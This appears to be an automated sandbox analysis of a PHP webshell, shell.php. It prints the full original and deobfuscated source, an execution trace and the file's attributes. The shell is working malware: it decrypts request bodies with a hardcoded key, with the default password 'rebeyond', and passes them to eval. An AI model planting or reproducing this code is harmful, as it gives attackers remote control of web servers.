PHP Malware Analysis
shell.php
md5: 901c391f79607d8c07d392fa6c7b4c0f
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
- base64_decode (Deobfuscated)
Environment
- error_reporting (Deobfuscated, Original, Traces)
Execution
- eval (Deobfuscated, Original)
Files
- file_get_contents (Deobfuscated, Original)
Input
- php:\/\/input (Deobfuscated, Original, Traces)
Deobfuscated PHP code
<?php
@error_reporting(0);
session_start();
$key = "e45e329feb5d925b";
//该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION['k'] = $key;
session_write_close();
$post = file_get_contents("php://input");
if (!extension_loaded('openssl')) {
$t = "base64_decode";
$post = base64_decode($post . "");
for ($i = 0; $i < strlen($post); $i++) {
$post[$i] ^= $key[$i + 1 & 15];
}
} else {
$post = openssl_decrypt($post, "AES128", $key);
}
$arr = explode('|', $post);
$func = $arr[0];
$params = $arr[1];
class C
{
public function __invoke($p)
{
eval($p . "");
}
}
@call_user_func(new C(), $params);Execution traces
data/traces/901c391f79607d8c07d392fa6c7b4c0f_trace-1676247240.5241.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:14:26.421973]
1 0 1 0.000215 393512
1 3 0 0.000333 400136 {main} 1 /var/www/html/uploads/shell.php 0 0
2 4 0 0.000357 400136 error_reporting 0 /var/www/html/uploads/shell.php 2 1 0
2 4 1 0.000378 400176
2 4 R 0
2 5 0 0.000397 400136 session_start 0 /var/www/html/uploads/shell.php 3 0
2 5 1 0.000466 400888
2 5 R TRUE
1 A /var/www/html/uploads/shell.php 4 $key = 'e45e329feb5d925b'
1 A /var/www/html/uploads/shell.php 5 _SESSION['k'] = 'e45e329feb5d925b'
2 6 0 0.000525 401208 session_write_close 0 /var/www/html/uploads/shell.php 6 0
2 6 1 0.000558 401104
2 6 R TRUE
2 7 0 0.000577 401104 file_get_contents 0 /var/www/html/uploads/shell.php 7 1 'php://input'
2 7 1 0.000604 401840
2 7 R ''
1 A /var/www/html/uploads/shell.php 7 $post = ''
2 8 0 0.000638 401800 extension_loaded 0 /var/www/html/uploads/shell.php 8 1 'openssl'
2 8 1 0.000658 401840
2 8 R TRUE
2 9 0 0.000676 401800 openssl_decrypt 0 /var/www/html/uploads/shell.php 19 3 '' 'AES128' 'e45e329feb5d925b'
2 9 1 0.000716 401904
2 9 R FALSE
1 A /var/www/html/uploads/shell.php 19 $post = FALSE
2 10 0 0.000750 401800 explode 0 /var/www/html/uploads/shell.php 21 2 '|' FALSE
2 10 1 0.000770 402248
2 10 R [0 => '']
1 A /var/www/html/uploads/shell.php 21 $arr = [0 => '']
1 A /var/www/html/uploads/shell.php 22 $func = ''
1 A /var/www/html/uploads/shell.php 23 $params = NULL
2 12 0 0.000854 402216 C->__invoke 1 /var/www/html/uploads/shell.php 25 1 NULL
2 12 1 0.000875 402248
1 3 1 0.000886 402208
0.000917 316664
TRACE END [2023-02-12 22:14:26.422715]
Generated HTML code
<html><head></head><body></body></html>Original PHP code
<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>